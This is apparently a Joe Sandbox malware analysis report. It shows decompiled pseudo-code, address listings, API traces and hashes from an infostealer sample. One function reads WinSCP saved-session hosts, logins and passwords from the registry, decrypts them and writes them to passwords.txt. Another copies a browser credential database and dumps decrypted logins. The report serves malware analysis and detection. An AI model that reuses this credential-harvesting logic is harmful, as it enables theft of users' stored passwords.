                                                                                				intOrPtr* _t155;
                                                                                				void* _t177;
                                                                                				intOrPtr _t180;
                                                                                				void* _t186;
                                                                                				void* _t188;
                                                                                				void* _t189;
                                                                                				void* _t193;
                                                                                				void* _t195;
                                                                                				void* _t196;
                                                                                
                                                                                				_t178 = __edi;
                                                                                				_t177 = __edx;
                                                                                				_push(0xdac);
                                                                                				E004219DE(E00437349, __ebx, __edi, __esi);
                                                                                				 *(_t188 - 0xd9c) = 0;
                                                                                				 *(_t188 - 0x11c) = 0;
                                                                                				E00427E30(_t188 - 0x11b, 0, 0x103);
                                                                                				 *(_t188 - 0xd94) = 0x104;
                                                                                				 *((char*)(_t188 - 0x51c)) = 0;
                                                                                				E00427E30(_t188 - 0x51b, 0, 0x3ff);
                                                                                				 *((char*)(_t188 - 0x91c)) = 0;
                                                                                				E00427E30(_t188 - 0x91b, 0, 0x3ff);
                                                                                				 *((char*)(_t188 - 0xd1c)) = 0;
                                                                                				E00427E30(_t188 - 0xd1b, 0, 0x3ff);
                                                                                				_t193 = _t189 + 0x30;
                                                                                				 *((intOrPtr*)(_t188 - 0xdb4)) = 0x400;
                                                                                				 *((intOrPtr*)(_t188 - 0xdac)) = 0x400;
                                                                                				 *((intOrPtr*)(_t188 - 0xda0)) = 0x400;
                                                                                				if(RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Configuration", 0, 1, _t188 - 0xd90) != 0) {
                                                                                					L27:
                                                                                					return E00421A61(0, _t178, 0x80000001);
                                                                                				}
                                                                                				_push(_t188 - 0xdb8);
                                                                                				_push(_t188 - 0xda4);
                                                                                				_push(0);
                                                                                				_push(0x10);
                                                                                				_push(L"UseMasterPassword");
                                                                                				_push(L"Security");
                                                                                				_push( *(_t188 - 0xd90));
                                                                                				if( *0x44a0bc() != 0 &&  *(_t188 - 0xd90) != 0) {
                                                                                					RegCloseKey( *(_t188 - 0xd90));
                                                                                					 *(_t188 - 0xd90) = 0;
                                                                                				}
                                                                                				if( *((intOrPtr*)(_t188 - 0xda4)) == 0) {
                                                                                					L7:
                                                                                					if( *(_t188 - 0xd90) != 0) {
                                                                                						RegCloseKey( *(_t188 - 0xd90));
                                                                                						 *(_t188 - 0xd90) = 0;
                                                                                					}
                                                                                					L9:
                                                                                					if(RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Sessions", 0, 9, _t188 - 0xd90) != 0) {
                                                                                						goto L27;
                                                                                					}
                                                                                					if(RegEnumKeyExA( *(_t188 - 0xd90), 0, _t188 - 0x11c, _t188 - 0xd94, 0, 0, 0, 0) == 0) {
                                                                                						_t114 = E004037E9(_t188 - 0xd8c, L"passwords.txt");
                                                                                						__eflags =  *((intOrPtr*)(_t114 + 0x14)) - 8;
                                                                                						if( *((intOrPtr*)(_t114 + 0x14)) >= 8) {
                                                                                							_t114 =  *_t114;
                                                                                						}
                                                                                						_t115 = E0041E704(_t114, L"a+");
                                                                                						__eflags = 0;
                                                                                						_t185 = _t188 - 0xd8c;
                                                                                						 *((intOrPtr*)(_t188 - 0xd98)) = _t115;
                                                                                						E00403960(0, _t188 - 0xd8c, 1);
                                                                                						do {
                                                                                							_t180 =  *((intOrPtr*)(_t188 - 0xd98));
                                                                                							E0041E879(0, _t180, _t185, __eflags);
                                                                                							E0041E879(0, _t180, _t185, __eflags);
                                                                                							 *0x44a118( *(_t188 - 0xd90), _t188 - 0x11c, "HostName", 2, 0, _t188 - 0x51c, _t188 - 0xdb4, _t180, "Host: ", _t180, "Soft: WinSCP\n");
                                                                                							_t186 = "%s";
                                                                                							E0041E879(0, _t180, _t186, __eflags);
                                                                                							_t195 = _t193 + 0x1c;
                                                                                							 *((intOrPtr*)(_t188 - 0xdb0)) = 4;
                                                                                							__eflags =  *0x44a118( *(_t188 - 0xd90), _t188 - 0x11c, "PortNumber", 0xffff, 0, _t188 - 0xda8, _t188 - 0xdb0, _t180, _t186, _t188 - 0x51c);
                                                                                							if(__eflags != 0) {
                                                                                								_push(":22");
                                                                                								_push(_t180);
                                                                                								E0041E879(0, _t180, _t186, __eflags);
                                                                                							} else {
                                                                                								_push( *((intOrPtr*)(_t188 - 0xda8)));
                                                                                								_t155 = E00417463(0, _t188 - 0xd70, _t177, _t180, _t186, __eflags);
                                                                                								__eflags =  *((intOrPtr*)(_t155 + 0x14)) - 0x10;
                                                                                								if(__eflags >= 0) {
                                                                                									_t155 =  *_t155;
                                                                                								}
                                                                                								_push(_t155);
                                                                                								_push(":%s");
                                                                                								_push(_t180);
                                                                                								E0041E879(0, _t180, _t186, __eflags);
                                                                                								_t195 = _t195 + 0xc;
                                                                                								E00402C34(_t188 - 0xd70, 1, 0);
                                                                                							}
                                                                                							E0041E879(0, _t180, _t186, __eflags);
                                                                                							 *0x44a118( *(_t188 - 0xd90), _t188 - 0x11c, "UserName", 2, 0, _t188 - 0x91c, _t188 - 0xdac, _t180, "\nLogin: ");
                                                                                							E0041E879(0, _t180, _t186, __eflags);
                                                                                							_t196 = _t195 + 0xc;
                                                                                							 *((intOrPtr*)(_t188 - 0xd24)) = 0xf;
                                                                                							 *((intOrPtr*)(_t188 - 0xd28)) = 0;
                                                                                							 *((char*)(_t188 - 0xd38)) = 0;
                                                                                							 *(_t188 - 4) = 0;
                                                                                							 *0x44a118( *(_t188 - 0xd90), _t188 - 0x11c, "Password", 2, 0, _t188 - 0xd1c, _t188 - 0xda0, _t180, _t186, _t188 - 0x91c);
                                                                                							_t187 = E0041221B(0, _t188 - 0xd54, _t177, _t180, _t186, __eflags, _t188 - 0x51c, _t188 - 0x91c, _t188 - 0xd1c);
                                                                                							_t178 = _t188 - 0xd38;
                                                                                							 *(_t188 - 4) = 1;
                                                                                							E0040CFB8(_t178, _t144);
                                                                                							 *(_t188 - 4) = 0;
                                                                                							E00402C34(_t188 - 0xd54, 1, 0);
                                                                                							__eflags =  *((intOrPtr*)(_t188 - 0xd24)) - 0x10;
                                                                                							_t147 =  *((intOrPtr*)(_t188 - 0xd38));
                                                                                							if(__eflags < 0) {
                                                                                								_t147 = _t178;
                                                                                							}
                                                                                							_push(_t147);
                                                                                							_push("\nPassword: %s\n\n");
                                                                                							_push( *((intOrPtr*)(_t188 - 0xd98)));
                                                                                							E0041E879(0, _t178, _t187, __eflags);
                                                                                							_t193 = _t196 + 0xc;
                                                                                							 *(_t188 - 0xd9c) =  *(_t188 - 0xd9c) + 1;
                                                                                							 *(_t188 - 0xd94) = 0x104;
                                                                                							_t151 = RegEnumKeyExA( *(_t188 - 0xd90),  *(_t188 - 0xd9c), _t188 - 0x11c, _t188 - 0xd94, 0, 0, 0, 0);
                                                                                							 *(_t188 - 4) =  *(_t188 - 4) | 0xffffffff;
                                                                                							_t185 = _t151;
                                                                                							E00402C34(_t188 - 0xd38, 1, 0);
                                                                                							__eflags = _t151 - 0x103;
                                                                                						} while (__eflags != 0);
                                                                                						__eflags =  *(_t188 - 0xd90);
                                                                                						if(__eflags != 0) {
                                                                                							RegCloseKey( *(_t188 - 0xd90));
                                                                                							 *(_t188 - 0xd90) = 0;
                                                                                						}
                                                                                						_push( *((intOrPtr*)(_t188 - 0xd98)));
                                                                                						E0041EAA2(0, _t178, _t185, __eflags);
                                                                                						goto L27;
                                                                                					}
                                                                                					if( *(_t188 - 0xd90) != 0) {
                                                                                						RegCloseKey( *(_t188 - 0xd90));
                                                                                					}
                                                                                					goto L27;
                                                                                				}
                                                                                				if( *(_t188 - 0xd90) == 0) {
                                                                                					goto L9;
                                                                                				}
                                                                                				RegCloseKey( *(_t188 - 0xd90));
                                                                                				 *(_t188 - 0xd90) = 0;
                                                                                				goto L7;
                                                                                			}
















                                                                                0x004126bd
                                                                                0x004126bd
                                                                                0x004126bd
                                                                                0x004126c7
                                                                                0x004126db
                                                                                0x004126e1
                                                                                0x004126e7
                                                                                0x004126fd
                                                                                0x00412707
                                                                                0x0041270d
                                                                                0x0041271e
                                                                                0x00412724
                                                                                0x00412735
                                                                                0x0041273b
                                                                                0x00412743
                                                                                0x00412746
                                                                                0x0041274c
                                                                                0x00412752
                                                                                0x00412775
                                                                                0x00412adb
                                                                                0x00412ae0
                                                                                0x00412ae0
                                                                                0x00412781
                                                                                0x00412788
                                                                                0x00412789
                                                                                0x0041278a
                                                                                0x0041278c
                                                                                0x00412791
                                                                                0x00412796
                                                                                0x004127a4
                                                                                0x004127b4
                                                                                0x004127ba
                                                                                0x004127ba
                                                                                0x004127c6
                                                                                0x004127e2
                                                                                0x004127e8
                                                                                0x004127f0
                                                                                0x004127f6
                                                                                0x004127f6
                                                                                0x004127fc
                                                                                0x00412814
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041283b
                                                                                0x00412865
                                                                                0x0041286a
                                                                                0x0041286e
                                                                                0x00412870
                                                                                0x00412870
                                                                                0x00412878
                                                                                0x00412881
                                                                                0x00412883
                                                                                0x00412889
                                                                                0x0041288f
                                                                                0x00412894
                                                                                0x00412894
                                                                                0x004128a0
                                                                                0x004128ab
                                                                                0x004128d6
                                                                                0x004128e3
                                                                                0x004128ea
                                                                                0x004128ef
                                                                                0x00412918
                                                                                0x00412928
                                                                                0x0041292a
                                                                                0x00412964
                                                                                0x00412969
                                                                                0x0041296a
                                                                                0x0041292c
                                                                                0x0041292c
                                                                                0x00412938
                                                                                0x0041293d
                                                                                0x00412941
                                                                                0x00412943
                                                                                0x00412943
                                                                                0x00412945
                                                                                0x00412946
                                                                                0x0041294b
                                                                                0x0041294c
                                                                                0x00412951
                                                                                0x0041295d
                                                                                0x0041295d
                                                                                0x00412977
                                                                                0x004129a1
                                                                                0x004129b0
                                                                                0x004129b5
                                                                                0x004129b8
                                                                                0x004129c2
                                                                                0x004129c8
                                                                                0x004129eb
                                                                                0x004129f4
                                                                                0x00412a1a
                                                                                0x00412a1c
                                                                                0x00412a22
                                                                                0x00412a26
                                                                                0x00412a34
                                                                                0x00412a37
                                                                                0x00412a3c
                                                                                0x00412a43
                                                                                0x00412a49
                                                                                0x00412a4b
                                                                                0x00412a4b
                                                                                0x00412a4d
                                                                                0x00412a4e
                                                                                0x00412a53
                                                                                0x00412a59
                                                                                0x00412a5e
                                                                                0x00412a61
                                                                                0x00412a7f
                                                                                0x00412a8f
                                                                                0x00412a95
                                                                                0x00412aa2
                                                                                0x00412aa4
                                                                                0x00412aa9
                                                                                0x00412aa9
                                                                                0x00412ab5
                                                                                0x00412abb
                                                                                0x00412ac3
                                                                                0x00412ac9
                                                                                0x00412ac9
                                                                                0x00412acf
                                                                                0x00412ad5
                                                                                0x00000000
                                                                                0x00412ada
                                                                                0x00412843
                                                                                0x0041284f
                                                                                0x0041284f
                                                                                0x00000000
                                                                                0x00412843
                                                                                0x004127ce
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004127d6
                                                                                0x004127dc
                                                                                0x00000000

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 004126C7
                                                                                • _memset.LIBCMT ref: 004126E7
                                                                                • _memset.LIBCMT ref: 0041270D
                                                                                • _memset.LIBCMT ref: 00412724
                                                                                • _memset.LIBCMT ref: 0041273B
                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?), ref: 0041276D
                                                                                • RegGetValueW.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?,?,?,?,?,?,?,?,00000000,000003FF), ref: 0041279C
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?,\Opera Stable\), ref: 004127B4
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?,\Opera Stable\), ref: 004127D6
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?,\Opera Stable\), ref: 004127F0
                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?), ref: 0041280C
                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00412833
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?,\Opera Stable\), ref: 0041284F
                                                                                • _fprintf.LIBCMT ref: 004128A0
                                                                                • _fprintf.LIBCMT ref: 004128AB
                                                                                • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,?,?,00000001,passwords.txt), ref: 004128D6
                                                                                • _fprintf.LIBCMT ref: 004128EA
                                                                                • RegGetValueA.ADVAPI32 ref: 00412922
                                                                                • _fprintf.LIBCMT ref: 0041294C
                                                                                • _fprintf.LIBCMT ref: 0041296A
                                                                                • _fprintf.LIBCMT ref: 00412977
                                                                                • RegGetValueA.ADVAPI32(?,?,UserName,00000002,00000000,?,?), ref: 004129A1
                                                                                • _fprintf.LIBCMT ref: 004129B0
                                                                                • RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,?), ref: 004129F4
                                                                                  • Part of subcall function 0041221B: __EH_prolog3.LIBCMT ref: 00412234
                                                                                  • Part of subcall function 0041221B: GetProcessHeap.KERNEL32(00000008,?,?,?,00000028), ref: 0041228F
                                                                                  • Part of subcall function 0041221B: HeapAlloc.KERNEL32(00000000), ref: 00412296
                                                                                  • Part of subcall function 0041221B: GetProcessHeap.KERNEL32(00000000,?), ref: 004122AC
                                                                                  • Part of subcall function 0041221B: HeapFree.KERNEL32(00000000), ref: 004122B3
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • _fprintf.LIBCMT ref: 00412A59
                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412A8F
                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00412AC3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fprintf$CloseValue$Heap_memset$EnumOpenProcess_memmove$AllocFreeH_prolog3H_prolog3_
                                                                                • String ID: Login: $Password: %s$:%s$:22$Host: $HostName$Password$PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                • API String ID: 61070830-1600676177
                                                                                • Opcode ID: b701ba94452cc774ee41efd4a3fa54942812168d8ddb2898d493336c28fa7959
                                                                                • Instruction ID: c6a946c8e662e18cfefa1c2ea30f102adf18462cd55a2cbc4d69bf1881fb66e2
                                                                                • Opcode Fuzzy Hash: b701ba94452cc774ee41efd4a3fa54942812168d8ddb2898d493336c28fa7959
                                                                                • Instruction Fuzzy Hash: 49B10AB194022CAEEB209B91DC86FEABB7DEF05344F0000EBB508A2151D7786FD58F65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 39%
                                                                                			E0040FA8E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t69;
                                                                                				void* _t74;
                                                                                				void* _t78;
                                                                                				intOrPtr _t80;
                                                                                				intOrPtr _t81;
                                                                                				void* _t83;
                                                                                				intOrPtr _t85;
                                                                                				void* _t95;
                                                                                				intOrPtr* _t96;
                                                                                				void* _t101;
                                                                                				void* _t102;
                                                                                				void* _t111;
                                                                                				intOrPtr* _t112;
                                                                                				intOrPtr _t115;
                                                                                				void* _t141;
                                                                                				CHAR* _t160;
                                                                                				char* _t161;
                                                                                				void* _t162;
                                                                                				void* _t163;
                                                                                				void* _t164;
                                                                                				void* _t167;
                                                                                
                                                                                				_t158 = __edi;
                                                                                				_t114 = __ebx;
                                                                                				E004219DE(E00436710, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t162 - 0x184)) =  *((intOrPtr*)(_t162 + 8));
                                                                                				 *((intOrPtr*)(_t162 - 0x178)) =  *((intOrPtr*)(_t162 + 0xc));
                                                                                				 *((intOrPtr*)(_t162 - 0x174)) =  *((intOrPtr*)(_t162 + 0x10));
                                                                                				_t160 = __ecx;
                                                                                				GetCurrentDirectoryA(0x104, _t162 - 0x118);
                                                                                				 *0x44a1b8(_t162 - 0x118, "\\temp", 0x180);
                                                                                				CopyFileA(_t160, _t162 - 0x118, 1);
                                                                                				_t161 =  *0x449db4; // 0x147e650
                                                                                				_t69 =  *0x44a0a4(_t162 - 0x118, _t162 - 0x188);
                                                                                				if(_t69 == 0) {
                                                                                					_t74 =  *0x44a058( *((intOrPtr*)(_t162 - 0x188)), _t161, 0xffffffff, _t162 - 0x170, _t69);
                                                                                					_t164 = _t163 + 0x14;
                                                                                					if(_t74 == 0) {
                                                                                						_t158 = E00420300( *0x449f3c, "a+");
                                                                                						if(_t158 != 0) {
                                                                                							_t78 =  *0x44a074( *((intOrPtr*)(_t162 - 0x170)));
                                                                                							_t174 = _t78 - 0x64;
                                                                                							if(_t78 == 0x64) {
                                                                                								_t161 = "\n";
                                                                                								do {
                                                                                									_t80 =  *0x44a094( *((intOrPtr*)(_t162 - 0x170)), 0);
                                                                                									 *((intOrPtr*)(_t162 - 0x180)) = _t80;
                                                                                									_t81 =  *0x44a094( *((intOrPtr*)(_t162 - 0x170)), 1);
                                                                                									_t164 = _t164 + 0x10;
                                                                                									 *((intOrPtr*)(_t162 - 0x17c)) = _t81;
                                                                                									_t83 =  *0x44a088( *((intOrPtr*)(_t162 - 0x170)), 2,  *0x44a080( *((intOrPtr*)(_t162 - 0x170)), 2,  *((intOrPtr*)(_t162 - 0x178))));
                                                                                									_t115 = _t162 - 0x134;
                                                                                									E0040F94A(_t115,  *((intOrPtr*)(_t162 - 0x174)), _t83, _t158, _t161, _t174);
                                                                                									 *(_t162 - 4) =  *(_t162 - 4) & 0x00000000;
                                                                                									_t85 =  *((intOrPtr*)(_t162 - 0x134));
                                                                                									if( *((intOrPtr*)(_t162 - 0x120)) < 0x10) {
                                                                                										_t85 = _t115;
                                                                                									}
                                                                                									_t114 = 0x43e028;
                                                                                									_push(0x43e028);
                                                                                									_push(_t85);
                                                                                									if( *0x44a1d8() != 0) {
                                                                                										E0041E879(0x43e028, _t158, _t161, __eflags);
                                                                                										E0041E879(0x43e028, _t158, _t161, __eflags);
                                                                                										E0041E879(_t114, _t158, _t161, __eflags);
                                                                                										E0041E879(_t114, _t158, _t161, __eflags);
                                                                                										E0041E879(_t114, _t158, _t161, __eflags);
                                                                                										E0041E879(_t114, _t158, _t161, __eflags);
                                                                                										_t167 = _t164 + 0x3c;
                                                                                										E0041E879(_t114, _t158, _t161, __eflags);
                                                                                										_t95 =  *0x44a088( *((intOrPtr*)(_t162 - 0x170)), 2,  *0x44a080( *((intOrPtr*)(_t162 - 0x170)), 2,  *((intOrPtr*)(_t162 - 0x178)), _t158, _t161, _t158, "Login: %s",  *((intOrPtr*)(_t162 - 0x17c)), _t158, _t161, _t158, "Host: %s",  *((intOrPtr*)(_t162 - 0x180)), _t158, _t161, _t158, "Soft: %s",  *((intOrPtr*)(_t162 - 0x184)), _t158, _t161));
                                                                                										_t114 = _t162 - 0x150;
                                                                                										_t96 = E0040F94A(_t162 - 0x150,  *((intOrPtr*)(_t162 - 0x174)), _t95, _t158, _t161, __eflags);
                                                                                										__eflags =  *((intOrPtr*)(_t96 + 0x14)) - 0x10;
                                                                                										if(__eflags >= 0) {
                                                                                											_t96 =  *_t96;
                                                                                										}
                                                                                										_push(_t96);
                                                                                										_push("Password: %s");
                                                                                										_push(_t158);
                                                                                										E0041E879(_t114, _t158, _t161, __eflags);
                                                                                										_t141 = _t162 - 0x150;
                                                                                										goto L15;
                                                                                									} else {
                                                                                										_t102 =  *0x44a1d8( *((intOrPtr*)(_t162 - 0x17c)), 0x43e028);
                                                                                										_t177 = _t102;
                                                                                										if(_t102 != 0) {
                                                                                											E0041E879(0x43e028, _t158, _t161, _t177);
                                                                                											E0041E879(0x43e028, _t158, _t161, _t177);
                                                                                											E0041E879(_t114, _t158, _t161, _t177);
                                                                                											E0041E879(_t114, _t158, _t161, _t177);
                                                                                											E0041E879(_t114, _t158, _t161, _t177);
                                                                                											E0041E879(_t114, _t158, _t161, _t177);
                                                                                											_t167 = _t164 + 0x3c;
                                                                                											E0041E879(_t114, _t158, _t161, _t177);
                                                                                											_t111 =  *0x44a088( *((intOrPtr*)(_t162 - 0x170)), 2,  *0x44a080( *((intOrPtr*)(_t162 - 0x170)), 2,  *((intOrPtr*)(_t162 - 0x178)), _t158, _t161, _t158, "Login: %s",  *((intOrPtr*)(_t162 - 0x17c)), _t158, _t161, _t158, "Host: %s",  *((intOrPtr*)(_t162 - 0x180)), _t158, _t161, _t158, "Soft: %s",  *((intOrPtr*)(_t162 - 0x184)), _t158, _t161));
                                                                                											_t114 = _t162 - 0x16c;
                                                                                											_t112 = E0040F94A(_t162 - 0x16c,  *((intOrPtr*)(_t162 - 0x174)), _t111, _t158, _t161, _t177);
                                                                                											_t178 =  *((intOrPtr*)(_t112 + 0x14)) - 0x10;
                                                                                											if( *((intOrPtr*)(_t112 + 0x14)) >= 0x10) {
                                                                                												_t112 =  *_t112;
                                                                                											}
                                                                                											_push(_t112);
                                                                                											_push("Password: %s");
                                                                                											_push(_t158);
                                                                                											E0041E879(_t114, _t158, _t161, _t178);
                                                                                											_t141 = _t162 - 0x16c;
                                                                                											L15:
                                                                                											_t164 = _t167 + 0xc;
                                                                                											E00402C34(_t141, 1, 0);
                                                                                											_push("\n\n");
                                                                                											_push(_t158);
                                                                                											E0041E879(_t114, _t158, _t161, _t178);
                                                                                										}
                                                                                									}
                                                                                									 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
                                                                                									E00402C34(_t162 - 0x134, 1, 0);
                                                                                									_t101 =  *0x44a074( *((intOrPtr*)(_t162 - 0x170)));
                                                                                									_t179 = _t101 - 0x64;
                                                                                								} while (_t101 == 0x64);
                                                                                							}
                                                                                							_push(_t158);
                                                                                							E0041EAA2(_t114, _t158, _t161, _t179);
                                                                                						}
                                                                                					}
                                                                                					 *0x44a078( *((intOrPtr*)(_t162 - 0x170)));
                                                                                					 *0x44a0a8( *((intOrPtr*)(_t162 - 0x188)));
                                                                                				}
                                                                                				DeleteFileA(_t162 - 0x118);
                                                                                				return E00421A61(_t114, _t158, _t161);
                                                                                			}
























                                                                                0x0040fa8e
                                                                                0x0040fa8e
                                                                                0x0040fa98
                                                                                0x0040faa0
                                                                                0x0040faa9
                                                                                0x0040fab2
                                                                                0x0040fac4
                                                                                0x0040fac6
                                                                                0x0040fad8
                                                                                0x0040fae8
                                                                                0x0040faee
                                                                                0x0040fb02
                                                                                0x0040fb0c
                                                                                0x0040fb23
                                                                                0x0040fb29
                                                                                0x0040fb2e
                                                                                0x0040fb44
                                                                                0x0040fb4a
                                                                                0x0040fb56
                                                                                0x0040fb5d
                                                                                0x0040fb60
                                                                                0x0040fb66
                                                                                0x0040fb6b
                                                                                0x0040fb73
                                                                                0x0040fb81
                                                                                0x0040fb87
                                                                                0x0040fb8d
                                                                                0x0040fb96
                                                                                0x0040fbb5
                                                                                0x0040fbc5
                                                                                0x0040fbcb
                                                                                0x0040fbd2
                                                                                0x0040fbdd
                                                                                0x0040fbe3
                                                                                0x0040fbe5
                                                                                0x0040fbe5
                                                                                0x0040fbe7
                                                                                0x0040fbec
                                                                                0x0040fbed
                                                                                0x0040fbf6
                                                                                0x0040fcc8
                                                                                0x0040fcd9
                                                                                0x0040fce3
                                                                                0x0040fcf4
                                                                                0x0040fcfe
                                                                                0x0040fd0f
                                                                                0x0040fd14
                                                                                0x0040fd19
                                                                                0x0040fd3f
                                                                                0x0040fd4f
                                                                                0x0040fd55
                                                                                0x0040fd5a
                                                                                0x0040fd60
                                                                                0x0040fd62
                                                                                0x0040fd62
                                                                                0x0040fd64
                                                                                0x0040fd65
                                                                                0x0040fd6a
                                                                                0x0040fd6b
                                                                                0x0040fd70
                                                                                0x00000000
                                                                                0x0040fbfc
                                                                                0x0040fc03
                                                                                0x0040fc09
                                                                                0x0040fc0b
                                                                                0x0040fc13
                                                                                0x0040fc24
                                                                                0x0040fc2e
                                                                                0x0040fc3f
                                                                                0x0040fc49
                                                                                0x0040fc5a
                                                                                0x0040fc5f
                                                                                0x0040fc64
                                                                                0x0040fc8a
                                                                                0x0040fc9a
                                                                                0x0040fca0
                                                                                0x0040fca5
                                                                                0x0040fcab
                                                                                0x0040fcad
                                                                                0x0040fcad
                                                                                0x0040fcaf
                                                                                0x0040fcb0
                                                                                0x0040fcb5
                                                                                0x0040fcb6
                                                                                0x0040fcbb
                                                                                0x0040fd76
                                                                                0x0040fd76
                                                                                0x0040fd7d
                                                                                0x0040fd82
                                                                                0x0040fd87
                                                                                0x0040fd88
                                                                                0x0040fd8e
                                                                                0x0040fc0b
                                                                                0x0040fd8f
                                                                                0x0040fd9d
                                                                                0x0040fda8
                                                                                0x0040fdaf
                                                                                0x0040fdaf
                                                                                0x0040fb6b
                                                                                0x0040fdb8
                                                                                0x0040fdb9
                                                                                0x0040fdbe
                                                                                0x0040fb4a
                                                                                0x0040fdc5
                                                                                0x0040fdd2
                                                                                0x0040fdd8
                                                                                0x0040fde0
                                                                                0x0040fdeb

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0040FA98
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,00000180,00410FDE,?,?,?), ref: 0040FAC6
                                                                                • lstrcat.KERNEL32(?,\temp), ref: 0040FAD8
                                                                                • CopyFileA.KERNEL32 ref: 0040FAE8
                                                                                • DeleteFileA.KERNEL32(?,00000001), ref: 0040FDE0
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                  • Part of subcall function 0040F94A: __EH_prolog3_GS.LIBCMT ref: 0040F951
                                                                                  • Part of subcall function 0040F94A: _memset.LIBCMT ref: 0040F99F
                                                                                  • Part of subcall function 0040F94A: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000074,00410302), ref: 0040F9DA
                                                                                • StrCmpCA.SHLWAPI(?,0043E028), ref: 0040FBEE
                                                                                • StrCmpCA.SHLWAPI(?,0043E028), ref: 0040FC03
                                                                                • _fprintf.LIBCMT ref: 0040FC13
                                                                                • _fprintf.LIBCMT ref: 0040FC24
                                                                                • _fprintf.LIBCMT ref: 0040FC2E
                                                                                • _fprintf.LIBCMT ref: 0040FC3F
                                                                                • _fprintf.LIBCMT ref: 0040FC49
                                                                                • _fprintf.LIBCMT ref: 0040FC5A
                                                                                • _fprintf.LIBCMT ref: 0040FC64
                                                                                • _fprintf.LIBCMT ref: 0040FCB6
                                                                                • _fprintf.LIBCMT ref: 0040FCC8
                                                                                • _fprintf.LIBCMT ref: 0040FCD9
                                                                                  • Part of subcall function 0041E879: __lock_file.LIBCMT ref: 0041E8C0
                                                                                  • Part of subcall function 0041E879: __stbuf.LIBCMT ref: 0041E944
                                                                                  • Part of subcall function 0041E879: __output_l.LIBCMT ref: 0041E954
                                                                                  • Part of subcall function 0041E879: __ftbuf.LIBCMT ref: 0041E95E
                                                                                • _fprintf.LIBCMT ref: 0040FCE3
                                                                                • _fprintf.LIBCMT ref: 0040FCF4
                                                                                • _fprintf.LIBCMT ref: 0040FCFE
                                                                                • _fprintf.LIBCMT ref: 0040FD0F
                                                                                • _fprintf.LIBCMT ref: 0040FD19
                                                                                • _fprintf.LIBCMT ref: 0040FD6B
                                                                                • _fprintf.LIBCMT ref: 0040FD88
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fprintf$FileH_prolog3_$AllocCopyCurrentDeleteDirectoryLocal__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcat
                                                                                • String ID: (C$Host: %s$Login: %s$Password: %s$Soft: %s$\temp$hC
                                                                                • API String ID: 162908412-3837908046
                                                                                • Opcode ID: 4e07b95e7a7402d66babf50e722e62238adf2f93084dbe4384c26c2d9dcea29d
                                                                                • Instruction ID: b771211359e168c9327bb717ff6b7cafefa7b7b209b9c1f12ec4e90bf366e63d
                                                                                • Opcode Fuzzy Hash: 4e07b95e7a7402d66babf50e722e62238adf2f93084dbe4384c26c2d9dcea29d
